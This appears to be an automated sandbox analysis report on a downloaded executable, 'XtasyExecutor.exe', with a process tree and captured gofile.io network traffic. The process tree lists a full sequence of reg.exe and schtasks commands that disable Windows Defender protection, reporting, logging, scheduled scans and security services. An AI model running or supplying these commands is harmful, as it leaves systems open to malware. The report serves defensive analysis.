      System Location Discovery: System Language Discovery
      PID:6100
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:6116
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:6132
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2184
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2412
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5092
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2860
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5184
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5200
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      4⤵
      System Location Discovery: System Language Discovery
      PID:5212
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      System Location Discovery: System Language Discovery
      PID:5228
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      System Location Discovery: System Language Discovery
      PID:5280
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      System Location Discovery: System Language Discovery
      PID:3684
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      System Location Discovery: System Language Discovery
      PID:2848
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3208
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1276
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2824
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:1144
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:5116
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies Security services
      System Location Discovery: System Language Discovery
      PID:5152
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies Security services
      System Location Discovery: System Language Discovery
      PID:3652
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies Security services
      System Location Discovery: System Language Discovery
      PID:5476
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies Security services
      System Location Discovery: System Language Discovery
      PID:5036
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies security service
      System Location Discovery: System Language Discovery
      PID:5480
- C:\Users\Admin\Downloads\XtasyExecutor.exe
  "C:\Users\Admin\Downloads\XtasyExecutor.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
  2⤵
  PID:5492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1
  2⤵
  PID:5500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
  2⤵
  PID:5656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11436940614417948909,16107806320196705307,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2728 /prefetch:1
  2⤵
  PID:5664

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:856

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3980

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2832

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1628

Network

DNS

gofile.io

msedge.exe

Remote address:

8.8.8.8:53

Request

gofile.io

IN A

Response

gofile.io

IN A

45.112.123.126
GET

https://gofile.io/d/Dmq7NE

msedge.exe

Remote address:

45.112.123.126:443

Request

GET /d/Dmq7NE HTTP/2.0
host: gofile.io
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx/1.27.1
date: Tue, 17 Dec 2024 18:11:35 GMT
content-type: text/html; charset=UTF-8
x-dns-prefetch-control: off
expect-ct: max-age=0
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=15552000; includeSubDomains
x-download-options: noopen
x-content-type-options: nosniff
origin-agent-cluster: ?1
x-permitted-cross-domain-policies: none
referrer-policy: origin
x-xss-protection: 0
cache-control: public, max-age=0
last-modified: Mon, 02 Dec 2024 21:48:24 GMT
etag: W/"1cfa-19389589822"
content-encoding: gzip
GET

https://gofile.io/dist/css/output.css

msedge.exe

Remote address:

45.112.123.126:443

Request

GET /dist/css/output.css HTTP/2.0
host: gofile.io
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://gofile.io/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx/1.27.1
date: Tue, 17 Dec 2024 18:11:35 GMT
content-type: text/css; charset=UTF-8
x-dns-prefetch-control: off
expect-ct: max-age=0
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=15552000; includeSubDomains
x-download-options: noopen
x-content-type-options: nosniff
origin-agent-cluster: ?1
x-permitted-cross-domain-policies: none
referrer-policy: origin
x-xss-protection: 0
cache-control: public, max-age=0
last-modified: Sat, 14 Dec 2024 17:49:52 GMT
etag: W/"10905-193c64a854d"
content-encoding: gzip
GET

https://gofile.io/plugins/fontawesome/css/all.min.css

msedge.exe

Remote address:

45.112.123.126:443

Request

GET /plugins/fontawesome/css/all.min.css HTTP/2.0
host: gofile.io
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://gofile.io/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx/1.27.1
date: Tue, 17 Dec 2024 18:11:35 GMT
content-type: text/css; charset=UTF-8
x-dns-prefetch-control: off
expect-ct: max-age=0
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=15552000; includeSubDomains
x-download-options: noopen
x-content-type-options: nosniff
origin-agent-cluster: ?1
x-permitted-cross-domain-policies: none
referrer-policy: origin
x-xss-protection: 0
cache-control: public, max-age=0
last-modified: Mon, 02 Dec 2024 21:48:24 GMT
etag: W/"17906-19389589822"
content-encoding: gzip
GET

https://gofile.io/dist/js/global.js

msedge.exe

Remote address:

45.112.123.126:443

Request

GET /dist/js/global.js HTTP/2.0
host: gofile.io
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://gofile.io/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx/1.27.1
date: Tue, 17 Dec 2024 18:11:35 GMT
content-type: application/javascript; charset=UTF-8
x-dns-prefetch-control: off
expect-ct: max-age=0
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=15552000; includeSubDomains
x-download-options: noopen
x-content-type-options: nosniff
origin-agent-cluster: ?1
x-permitted-cross-domain-policies: none
referrer-policy: origin
x-xss-protection: 0
cache-control: public, max-age=0
last-modified: Sat, 14 Dec 2024 17:49:52 GMT
etag: W/"55ec8-193c64a8551"
content-encoding: gzip
GET

https://gofile.io/dist/js/framework.js

msedge.exe

Remote address:

45.112.123.126:443

Request

GET /dist/js/framework.js HTTP/2.0
host: gofile.io
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://gofile.io/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx/1.27.1
date: Tue, 17 Dec 2024 18:11:35 GMT
content-type: application/javascript; charset=UTF-8
x-dns-prefetch-control: off
expect-ct: max-age=0
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=15552000; includeSubDomains
x-download-options: noopen
x-content-type-options: nosniff
origin-agent-cluster: ?1
x-permitted-cross-domain-policies: none
referrer-policy: origin
x-xss-protection: 0
cache-control: public, max-age=0
last-modified: Mon, 02 Dec 2024 21:48:24 GMT
etag: W/"55a-1938958981e"
content-encoding: gzip
GET

https://gofile.io/dist/js/blockies.min.js

msedge.exe

Remote address:

45.112.123.126:443

Request

GET /dist/js/blockies.min.js HTTP/2.0
host: gofile.io
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://gofile.io/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx/1.27.1
date: Tue, 17 Dec 2024 18:11:35 GMT
content-type: application/javascript; charset=UTF-8
x-dns-prefetch-control: off
expect-ct: max-age=0
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=15552000; includeSubDomains
x-download-options: noopen
x-content-type-options: nosniff
origin-agent-cluster: ?1
x-permitted-cross-domain-policies: none
referrer-policy: origin
x-xss-protection: 0
cache-control: public, max-age=0
last-modified: Wed, 04 Dec 2024 03:24:05 GMT
etag: W/"231b-1938fb24543"
content-encoding: gzip
GET

https://gofile.io/dist/img/logo-small-70.png

msedge.exe

Remote address:

45.112.123.126:443

Request

GET /dist/img/logo-small-70.png HTTP/2.0
host: gofile.io
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://gofile.io/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx/1.27.1
date: Tue, 17 Dec 2024 18:11:35 GMT
content-type: image/png
content-length: 2367
x-dns-prefetch-control: off
expect-ct: max-age=0
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=15552000; includeSubDomains
x-download-options: noopen
x-content-type-options: nosniff
origin-agent-cluster: ?1
x-permitted-cross-domain-policies: none
referrer-policy: origin
x-xss-protection: 0
accept-ranges: bytes
cache-control: public, max-age=0
last-modified: Mon, 02 Dec 2024 21:48:24 GMT
etag: W/"93f-1938958981e"
GET

https://gofile.io/plugins/fontawesome/webfonts/fa-solid-900.woff2

msedge.exe

Remote address:

45.112.123.126:443

Request

GET /plugins/fontawesome/webfonts/fa-solid-900.woff2 HTTP/2.0
host: gofile.io
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://gofile.io
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://gofile.io/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx/1.27.1
date: Tue, 17 Dec 2024 18:11:35 GMT
content-type: font/woff2
content-length: 157192
x-dns-prefetch-control: off
expect-ct: max-age=0
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=15552000; includeSubDomains
x-download-options: noopen
x-content-type-options: nosniff
origin-agent-cluster: ?1
x-permitted-cross-domain-policies: none
referrer-policy: origin
x-xss-protection: 0
accept-ranges: bytes
cache-control: public, max-age=0
last-modified: Mon, 02 Dec 2024 21:48:25 GMT
etag: W/"26608-1938958982a"
GET

https://gofile.io/plugins/fontawesome/webfonts/fa-brands-400.woff2

msedge.exe

Remote address:

45.112.123.126:443

Request

GET /plugins/fontawesome/webfonts/fa-brands-400.woff2 HTTP/2.0
host: gofile.io
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://gofile.io
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://gofile.io/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx/1.27.1
date: Tue, 17 Dec 2024 18:11:35 GMT
content-type: font/woff2
content-length: 118072
x-dns-prefetch-control: off
expect-ct: max-age=0
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=15552000; includeSubDomains
x-download-options: noopen
x-content-type-options: nosniff
origin-agent-cluster: ?1
x-permitted-cross-domain-policies: none
referrer-policy: origin
x-xss-protection: 0
accept-ranges: bytes
cache-control: public, max-age=0
last-modified: Mon, 02 Dec 2024 21:48:24 GMT
etag: W/"1cd38-19389589822"
GET

https://gofile.io/dist/img/favicon32.png

msedge.exe

Remote address:

45.112.123.126:443

Request

GET /dist/img/favicon32.png HTTP/2.0
host: gofile.io
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://gofile.io/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx/1.27.1
date: Tue, 17 Dec 2024 18:11:36 GMT
content-type: image/png
content-length: 903
x-dns-prefetch-control: off
expect-ct: max-age=0
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=15552000; includeSubDomains
x-download-options: noopen
x-content-type-options: nosniff
origin-agent-cluster: ?1
x-permitted-cross-domain-policies: none
referrer-policy: origin
x-xss-protection: 0
accept-ranges: bytes
cache-control: public, max-age=0
last-modified: Mon, 02 Dec 2024 21:48:24 GMT
etag: W/"387-1938958981e"
GET

https://gofile.io/contents/filemanager.html

msedge.exe

Remote address:

45.112.123.126:443

Request

GET /contents/filemanager.html HTTP/2.0
host: gofile.io
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://gofile.io/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: accountToken=JkRhayJOGMo94C5Hr0iFEitkBv1kOqRF

Response

HTTP/2.0 200

server: nginx/1.27.1
date: Tue, 17 Dec 2024 18:11:36 GMT
content-type: text/html; charset=UTF-8
x-dns-prefetch-control: off
expect-ct: max-age=0
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=15552000; includeSubDomains
x-download-options: noopen
x-content-type-options: nosniff
origin-agent-cluster: ?1
x-permitted-cross-domain-policies: none
referrer-policy: origin
x-xss-protection: 0
cache-control: public, max-age=0
last-modified: Wed, 04 Dec 2024 02:58:18 GMT
etag: W/"484e-1938f9aaa9f"
content-encoding: gzip
DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

136.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

136.32.126.40.in-addr.arpa

IN PTR

Response
DNS

126.123.112.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

126.123.112.45.in-addr.arpa

IN PTR

Response
DNS

83.210.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

83.210.23.2.in-addr.arpa

IN PTR

Response

83.210.23.2.in-addr.arpa

IN PTR

a2-23-210-83deploystaticakamaitechnologiescom
DNS

s.gofile.io

msedge.exe

Remote address:

8.8.8.8:53

Request

s.gofile.io

IN A

Response

s.gofile.io

IN A

51.75.242.210
DNS

api.gofile.io

msedge.exe

Remote address:

8.8.8.8:53

Request

api.gofile.io

IN A

Response

api.gofile.io

IN A

45.112.123.126
GET

https://s.gofile.io/js/script.js

msedge.exe

Remote address:

51.75.242.210:443

Request

GET /js/script.js HTTP/2.0
host: s.gofile.io
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://gofile.io/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

access-control-allow-origin: *
cache-control: public, max-age=86400, must-revalidate
content-type: application/javascript
cross-origin-resource-policy: cross-origin
date: Tue, 17 Dec 2024 18:11:35 GMT
server: Cowboy
x-content-type-options: nosniff
content-length: 1346
POST

https://api.gofile.io/accounts

msedge.exe

Remote address:

45.112.123.126:443

Request

POST /accounts HTTP/2.0
host: api.gofile.io
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://gofile.io
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://gofile.io/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx/1.27.1
date: Tue, 17 Dec 2024 18:11:36 GMT
content-type: application/json; charset=utf-8
access-control-allow-origin: https://gofile.io
access-control-allow-headers: Content-Type, Authorization
access-control-allow-methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
access-control-allow-credentials: true
content-security-policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: cross-origin
origin-agent-cluster: ?1
referrer-policy: no-referrer
strict-transport-security: max-age=15552000; includeSubDomains
x-content-type-options: nosniff
x-dns-prefetch-control: off
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: none
x-xss-protection: 0
etag: W/"b2-bOhfY4+zMtEL8NlYrV7Q1PcOhZ4"
content-encoding: gzip
OPTIONS

https://api.gofile.io/accounts/website

msedge.exe

Remote address:

45.112.123.126:443

Request

OPTIONS /accounts/website HTTP/2.0
host: api.gofile.io
accept: */*
access-control-request-method: GET
access-control-request-headers: authorization
origin: https://gofile.io
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://gofile.io/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx/1.27.1
date: Tue, 17 Dec 2024 18:11:36 GMT
content-type: text/html; charset=utf-8
content-length: 8
access-control-allow-origin: https://gofile.io
access-control-allow-headers: Content-Type, Authorization
access-control-allow-methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
access-control-allow-credentials: true
content-security-policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: cross-origin
origin-agent-cluster: ?1
referrer-policy: no-referrer
strict-transport-security: max-age=15552000; includeSubDomains
x-content-type-options: nosniff
x-dns-prefetch-control: off
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: none
x-xss-protection: 0
allow: GET,HEAD
etag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
GET

https://api.gofile.io/accounts/website

msedge.exe

Remote address:

45.112.123.126:443

Request

GET /accounts/website HTTP/2.0
host: api.gofile.io
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
sec-ch-ua-mobile: ?0
authorization: Bearer JkRhayJOGMo94C5Hr0iFEitkBv1kOqRF
accept: */*
origin: https://gofile.io
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://gofile.io/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx/1.27.1
date: Tue, 17 Dec 2024 18:11:36 GMT
content-type: application/json; charset=utf-8
access-control-allow-origin: https://gofile.io
access-control-allow-headers: Content-Type, Authorization
access-control-allow-methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
access-control-allow-credentials: true
content-security-policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: cross-origin
origin-agent-cluster: ?1
referrer-policy: no-referrer
strict-transport-security: max-age=15552000; includeSubDomains
x-content-type-options: nosniff
x-dns-prefetch-control: off
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: none
x-xss-protection: 0
etag: W/"144-IZGGI83021/SAEaouJTvu+tywAY"
content-encoding: gzip
OPTIONS

https://api.gofile.io/contents/Dmq7NE?wt=4fd6sg89d7s6&contentFilter=&page=1&pageSize=1000&sortField=name&sortDirection=1

msedge.exe

Remote address:

45.112.123.126:443

Request

OPTIONS /contents/Dmq7NE?wt=4fd6sg89d7s6&contentFilter=&page=1&pageSize=1000&sortField=name&sortDirection=1 HTTP/2.0
host: api.gofile.io
accept: */*
access-control-request-method: GET
access-control-request-headers: authorization
origin: https://gofile.io
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://gofile.io/
accept-encoding: gzip, deflate, br
